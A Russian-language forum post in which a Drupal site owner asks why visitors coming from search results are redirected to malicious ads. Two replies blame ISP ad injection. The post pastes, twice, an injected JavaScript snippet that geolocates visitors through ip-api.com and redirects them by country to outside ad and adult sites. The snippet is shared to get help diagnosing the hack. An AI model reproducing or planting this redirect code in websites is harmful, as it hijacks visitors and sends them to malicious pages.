1 апреля 2021 в 8:51
Всем привет, не могу найти что ломанули.
При переходе на сайт с поисковой выдачи перенаправляет на вирусную рекламу, если прямой вход то нормально.
При первой инициализации сайта выполняется такой вот код:
<
script type = "text/javascript"
src = "http://gc.kis.v2.scr.kaspersky-labs.com/FD126C42-EBFA-4E12-B309-BB3FDD72...
charset = "UTF-8" > < /script><script> function ajax(options){ options = options ||{}; options.type=(options.type || "GET").toUpperCase(); options.dataType=options.dataType || "json"; var params=formatParams(options.data); var xhr; if(window.XMLHttpRequest){ xhr=new XMLHttpRequest(); }else if(window.ActiveObject){ xhr=new ActiveXobject('Microsoft.XMLHTTP'); } if(options.type=="GET"){ xhr.open("GET",options.url,true); xhr.send(null); }else if(options.type=="POST"){ xhr.open("post",options.url,true); xhr.setRequestHeader("Content-type","application/x - www - form - urlencoded "); xhr.send(params); } setTimeout(function(){ if(xhr.readySate!=4){ xhr.abort(); } },options.timeout); xhr.onreadystatechange=function(){ if(xhr.readyState==4){ var status=xhr.status; if(status>=200&& status<300 || status==304){ options.success&&options.success(xhr.responseText,xhr.responseXML); }else{ options.error&&options.error(status); } } } } function formatParams(data){ var arr=[]; for(var name in data){ arr.push(encodeURIComponent(name)+" = "+encodeURIComponent(data[name])); } arr.push(("
v = "+Math.random()).replace(".
","
")); return arr.join(" & "); } ajax({ url:"
https: //pro.ip-api.com/json?key=5wEQTAwoZ1M5i0M", type:'get', dataType:'json', timeout:10000, contentType:"application/json", success:function(data){ var location = JSON.parse(data), b = false; if (location.countryCode === "TW") { window.location.href = "https://www.indianav.com/"; b = true;} else if (location.countryCode === "HK") { window.location.href = "https://www.indianav.com/"; b = true; } else if (location.countryCode === "MO") { window.location.href = "https://www.indianav.com/"; b = true;} else if (location.countryCode === "JP") { window.location.href = "http://www.copyjapan.com/"; b = true;} else if (location.countryCode === "CN") { window.location.href = "https://www.google.com"; b = true;} else { window.location.href = "https://track.130.la/rMX8ZZ"; b = true; } ; console.log(JSON.parse(data)); }, error:function(e){ console.log(e); } }) </script>
script type = "text/javascript"
src = "http://gc.kis.v2.scr.kaspersky-labs.com/FD126C42-EBFA-4E12-B309-BB3FDD72...
charset = "UTF-8" > < /script><script> function ajax(options){ options = options ||{}; options.type=(options.type || "GET").toUpperCase(); options.dataType=options.dataType || "json"; var params=formatParams(options.data); var xhr; if(window.XMLHttpRequest){ xhr=new XMLHttpRequest(); }else if(window.ActiveObject){ xhr=new ActiveXobject('Microsoft.XMLHTTP'); } if(options.type=="GET"){ xhr.open("GET",options.url,true); xhr.send(null); }else if(options.type=="POST"){ xhr.open("post",options.url,true); xhr.setRequestHeader("Content-type","application/x - www - form - urlencoded "); xhr.send(params); } setTimeout(function(){ if(xhr.readySate!=4){ xhr.abort(); } },options.timeout); xhr.onreadystatechange=function(){ if(xhr.readyState==4){ var status=xhr.status; if(status>=200&& status<300 || status==304){ options.success&&options.success(xhr.responseText,xhr.responseXML); }else{ options.error&&options.error(status); } } } } function formatParams(data){ var arr=[]; for(var name in data){ arr.push(encodeURIComponent(name)+" = "+encodeURIComponent(data[name])); } arr.push(("
v = "+Math.random()).replace(".
","
")); return arr.join(" & "); } ajax({ url:"
https: //pro.ip-api.com/json?key=5wEQTAwoZ1M5i0M", type:'get', dataType:'json', timeout:10000, contentType:"application/json", success:function(data){ var location = JSON.parse(data), b = false; if (location.countryCode === "TW") { window.location.href = "https://www.indianav.com/"; b = true;} else if (location.countryCode === "HK") { window.location.href = "https://www.indianav.com/"; b = true; } else if (location.countryCode === "MO") { window.location.href = "https://www.indianav.com/"; b = true;} else if (location.countryCode === "JP") { window.location.href = "http://www.copyjapan.com/"; b = true;} else if (location.countryCode === "CN") { window.location.href = "https://www.google.com"; b = true;} else { window.location.href = "https://track.130.la/rMX8ZZ"; b = true; } ; console.log(JSON.parse(data)); }, error:function(e){ console.log(e); } }) </script>
Он собственно и отвечает за перенаправление, не могу понять откуда он подставляется, в файлах сайта вроде все ровно, может сервер ломанули и сначала запускается этот скрипт, а затем уже Drupal?
Комментарии
У меня была похожая проблема, оказалось, что не правильно был установлен ssl-сертификат, т.е. он работал но частично и мой интернет провайдер (теле 2 на тот момент) вставлял свою рекламу на сайт, я сначала даже подумала, что это вирус на сервере... так это было неожиданно
Что-то подобное наблюдал. Не совсем это но похоже.
Выяснилось что, если явно у ссылок не задан протокол, то провайдер сам занимается таким перенаправлением, да, да...